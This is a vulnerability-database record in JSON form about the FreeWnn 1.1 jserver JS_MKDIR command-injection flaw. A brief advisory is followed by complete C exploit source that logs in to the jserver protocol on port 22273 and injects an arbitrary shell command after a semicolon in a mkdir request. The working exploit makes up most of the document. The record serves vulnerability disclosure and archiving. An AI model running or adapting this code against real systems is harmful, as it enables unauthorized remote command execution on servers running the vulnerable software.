Description
No description provided by source.
{"lastseen": "2017-11-19T13:58:00", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "poc", "enchantments": {"score": {"value": 0.3, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.3}, "href": "https://www.seebug.org/vuldb/ssvid-75051", "references": [], "enchantments_done": [], "id": "SSV:75051", "title": "FreeWnn 1.1 jserver JS_MKDIR Metacharacter Command Execution Vulnerability", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 8, "sourceData": "\n source: http://www.securityfocus.com/bid/3860/info\r\n\r\nFreeWnn 1.1.0 is a kana-kanji (Japanese) translation system. This software is a client-server application, with the jserver portion acting as a server and performing translations for clients. The jserver component passes unsanitized client input from the JS_MKDIR command to a system() library call, so the shell that system() invokes treats a semicolon (";") in that input as a command separator, allowing arbitrary command execution. Commands sent in this manner are executed at the privilege level of the jserver process. 
\r\n\r\n/*=========================================================================\r\n Wnn6 Exploit (tested on IRIX6.5 WorldView Janapese)\r\n The Shadow Penguin Security (http://www.shadowpenguin.org)\r\n Written by UNYUN (unyun@shadowpenguin.org)\r\n =========================================================================\r\n*/\r\n#include <stdio.h>\r\n#include <netdb.h>\r\n#include <fcntl.h>\r\n#include <ctype.h>\r\n#include <unistd.h>\r\n#include <strings.h>\r\n#include <stdlib.h>\r\n#include <sys/socket.h>\r\n#include <sys/stat.h>\r\n#include <netinet/in.h>\r\n\r\n#define TARGET_PORT 22273\r\n\r\nint dump_recv(int sockfd)\r\n{\r\n static char buf[4096];\r\n int i,r,sum=0;\r\n\r\n r=recv(sockfd,buf,sizeof(buf),0);\r\n for (i=0;i<r;i++){\r\n printf("0x%02X ",buf[i]&0xff);\r\n sum+=(int)buf[i];\r\n }\r\n printf("\\n");\r\n return(sum);\r\n}\r\n\r\nmain(int argc,char *argv[])\r\n{\r\n int sockfd,i;\r\n struct sockaddr_in target;\r\n struct hostent *hs;\r\n static char buf[512];\r\n static char mkdircmd[4096];\r\n char hostname[4096];\r\n char username[4096];\r\n\r\n if (argc<3){\r\n printf("usage : %s TargetHost command {hostname} {username}\\n",argv[0]);\r\n exit(1);\r\n }\r\n strcpy(hostname,"localhost");\r\n strcpy(username,"root");\r\n if (argc>=5)\r\n strcpy(username,argv[4]);\r\n if (argc>=4)\r\n strcpy(hostname,argv[3]);\r\n sockfd=socket(PF_INET, SOCK_STREAM, 0);\r\n target.sin_family=AF_INET;\r\n target.sin_port=htons(TARGET_PORT);\r\n if ((target.sin_addr.s_addr=inet_addr(argv[1]))==-1){\r\n if ((hs=gethostbyname(argv[1]))==NULL){\r\n printf("Can not resolve specified host.\\n");\r\n exit(1);\r\n }\r\n target.sin_family = hs->h_addrtype;\r\n memcpy((caddr_t)&target.sin_addr.s_addr,hs->h_addr,hs->h_length);\r\n }\r\n if (connect(sockfd, (struct sockaddr*)&target, sizeof(target))!=0){\r\n printf("Can not connect to %s:%d\\n",argv[1],TARGET_PORT);\r\n exit(1);\r\n } \r\n\r\n /* JS_OPEN */\r\n buf[3]=1;\r\n buf[6]=0x4f;\r\n 
strncpy(buf+8,hostname,strlen(hostname));\r\n strncpy(buf+9+strlen(hostname),username,strlen(username));\r\n send(sockfd,buf,10+strlen(hostname)+strlen(username),0);\r\n dump_recv(sockfd);\r\n\r\n /* JS_ENV_EXIST */\r\n memset(buf,0,sizeof(buf));\r\n buf[3]=0x07;\r\n strncpy(buf+4,username,strlen(username));\r\n send(sockfd,buf,5+strlen(username),0);\r\n dump_recv(sockfd);\r\n\r\n /* JS_CONNECT */\r\n memset(buf,0,sizeof(buf));\r\n buf[3]=0x05;\r\n strncpy(buf+4,username,strlen(username));\r\n send(sockfd,buf,5+strlen(username),0);\r\n dump_recv(sockfd);\r\n\r\n /* JS_MKDIR */\r\n sprintf(mkdircmd,"a;%s",argv[2]);\r\n memset(buf,0,sizeof(buf));\r\n buf[3]=0x51;\r\n strncpy(buf+8,mkdircmd,strlen(mkdircmd));\r\n send(sockfd,buf,8+strlen(mkdircmd)+1,0);\r\n dump_recv(sockfd);\r\n\r\n close(sockfd);\r\n}\r\n\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-75051", "type": "seebug", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645364759}}
{}